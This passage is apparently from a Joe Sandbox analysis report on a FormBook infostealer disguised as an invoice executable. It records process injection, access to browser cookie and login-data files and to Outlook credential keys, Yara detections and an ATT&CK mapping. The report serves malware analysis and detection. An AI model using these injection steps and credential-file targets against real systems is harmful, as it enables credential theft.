Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\takeown.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: NULL target: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: NULL target: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\takeown.exe

Thread register set: target process: 7452

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\takeown.exe

Thread APC queued: target process: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 887008

Jump to behavior

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_007887B1 LogonUserW,

1_2_007887B1

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_00733B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00733B3A

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_007348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

1_2_007348D7

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_00794C7F mouse_event,

1_2_00794C7F

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Invoice Remittance ref20250226.exe"	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_00787CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

1_2_00787CAF

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_0078874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_0078874B

Source: Invoice Remittance ref20250226.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Invoice Remittance ref20250226.exe, b7xVJvvK.exe, 00000008.00000002.3724716095.0000000000E91000.00000002.00000001.00040000.00000000.sdmp, b7xVJvvK.exe, 00000008.00000000.1410881195.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, b7xVJvvK.exe, 0000000B.00000002.3725075760.0000000001A01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: b7xVJvvK.exe, 00000008.00000002.3724716095.0000000000E91000.00000002.00000001.00040000.00000000.sdmp, b7xVJvvK.exe, 00000008.00000000.1410881195.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, b7xVJvvK.exe, 0000000B.00000002.3725075760.0000000001A01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: b7xVJvvK.exe, 00000008.00000002.3724716095.0000000000E91000.00000002.00000001.00040000.00000000.sdmp, b7xVJvvK.exe, 00000008.00000000.1410881195.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, b7xVJvvK.exe, 0000000B.00000002.3725075760.0000000001A01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: b7xVJvvK.exe, 00000008.00000002.3724716095.0000000000E91000.00000002.00000001.00040000.00000000.sdmp, b7xVJvvK.exe, 00000008.00000000.1410881195.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, b7xVJvvK.exe, 0000000B.00000002.3725075760.0000000001A01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_0075862B cpuid

1_2_0075862B

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_00764E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_00764E87

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_00771E06 GetUserNameW,

1_2_00771E06

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_00763F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

1_2_00763F3A

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_007349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_007349A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1487507905.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3727463287.00000000057C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1493104684.00000000079B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3725513198.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3722004871.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1489001963.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3722928185.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3725327628.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\takeown.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: Invoice Remittance ref20250226.exe	Binary or memory string: WIN_81
Source: Invoice Remittance ref20250226.exe	Binary or memory string: WIN_XP
Source: Invoice Remittance ref20250226.exe	Binary or memory string: WIN_XPe
Source: Invoice Remittance ref20250226.exe	Binary or memory string: WIN_VISTA
Source: Invoice Remittance ref20250226.exe	Binary or memory string: WIN_7
Source: Invoice Remittance ref20250226.exe	Binary or memory string: WIN_8
Source: Invoice Remittance ref20250226.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1487507905.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3727463287.00000000057C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1493104684.00000000079B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3725513198.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3722004871.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1489001963.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3722928185.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3725327628.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_007A6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		1_2_007A6283
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_007A6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		1_2_007A6747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Invoice Remittance ref20250226.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Invoice Remittance ref20250226.exe